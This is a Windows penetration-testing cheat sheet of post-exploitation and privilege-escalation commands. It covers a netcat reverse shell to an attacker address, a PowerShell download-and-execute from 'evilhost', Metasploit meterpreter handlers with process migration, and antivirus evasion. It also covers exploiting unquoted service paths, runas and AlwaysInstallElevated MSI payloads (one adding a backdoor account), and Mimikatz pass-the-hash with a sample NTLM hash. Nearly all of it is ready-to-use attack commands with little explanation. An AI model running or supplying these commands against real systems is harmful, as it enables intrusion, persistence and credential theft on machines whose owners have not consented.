Global Tricks

# Getting shell in limited interpreter
system("start cmd.exe /k $cmd")

# Reverse shell
nc.exe attacker_ip attacker_port -e cmd.exe

# From admin to SYSTEM
psexec.exe -i -s %SystemRoot%\system32\cmd.exe

# AV Bypass
# You can generate a mutated binary
hyperion.exe ../backdoor.exe ../backdoor_mutation.exe

# Download and exec powershell on target
powershell.exe "IEX (New-Object  Net.WebClient).DownloadString('http://evilhost/Malicious.ps1')"

# Payload as a trusted binary
# Copy your payload into 
# Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"

Process Migration

# Migration can be essential for obtaining persistence
# You may need to migrate into a standard process
msf> ps aux 
msf> migrate <pid>

# Automatic migration is also sometimes needed if the shell dies quickly
$ cat automigrate.rc
run post/windows/manage/migrate

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST xx.xx.xx.xx
msf5 exploit(multi/handler) > set LPORT 5566
msf5 exploit(multi/handler) > set AutoRunScript multi_console_command -r /path/to/automigrate.rc
msf5 exploit(multi/handler) > exploit

Folder and Files Rights

# icacls lets you check file and folder permissions
C:> icacls Desktop/
C:> icacls root.txt

# If you have rights on the folder but not necessarily on the files inside it, you can grant them
C:> icacls root.txt /grant user:F

Unquoted Paths

# Some service paths are vulnerable
# This occurs because, for each whitespace in an unquoted path, Windows tries to find the binary at each intermediate location
C:\Program Files\something\winamp.exe

# You could place your payload in
C:\Program Files.exe

# The following command will display affected services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ rmthelastquote"

# Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST= LPORT=8989 -f exe -o A.exe
msf> upload -f A.exe
sc stop "Vulnerable Service"

# If you can't stop the service, you can reboot
shutdown /r /t 0

# The session will die quickly, so automatic migration is necessary:
# when a service starts on Windows, it must communicate with the Service Control Manager.
# If it does not, the Service Control Manager assumes something went wrong and terminates the process

# MSF Module for this vulnerability

Run As

# If an application is running as admin and its credentials are saved, you can abuse it by modifying its properties as follows:
C:\WINDOWS\system32\runas.exe /user:administrator /savecreds "C:\Documents and Settings\username\Desktop\nc.exe -nc 41337 -e C:\Windows\System32\cmd.exe"

# If you want to run a simple runas.exe:
C:\WINDOWS\system32\runas.exe /user:administrator /password:pass "C:\Documents and Settings\username\Desktop\nc.exe -nc 41337 -e C:\Windows\System32\cmd.exe"


# AlwaysInstallElevated is a policy setting that allows unprivileged users to run Windows Installer package files (MSI) with elevated permissions (SYSTEM)

# Check the value of these registry keys
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If set to 1, you can create your own MSI (or msi-nouac)
# Add user
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

# Or reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST= LPORT=8989 -f exe -o Payload.exe
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > malicious.msi

# You can then use msiexec to execute the payload
# /quiet = no messages to the user, /qn = no GUI, /i = regular install (no admin)
msiexec /quiet /qn /i C:\evil.msi

# MSF module

Pass the Hash using Machine Accounts

# You need to be a local admin on the target machine

# Finding domain computers that are members of interesting groups
Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain
net localgroup administrators /domain

# After gaining local admin, extract the machine account hash

# The compromised user can't access the DC
dir \\dc01\c$

# You can use Mimikatz to pass the hash and elevate to domain admin because WS01$ is a member of Domain Admins
sekurlsa::pth /user:ws01$ /domain:offense.local /ntlm:ab53503b0f35c9883ff89b75527d5861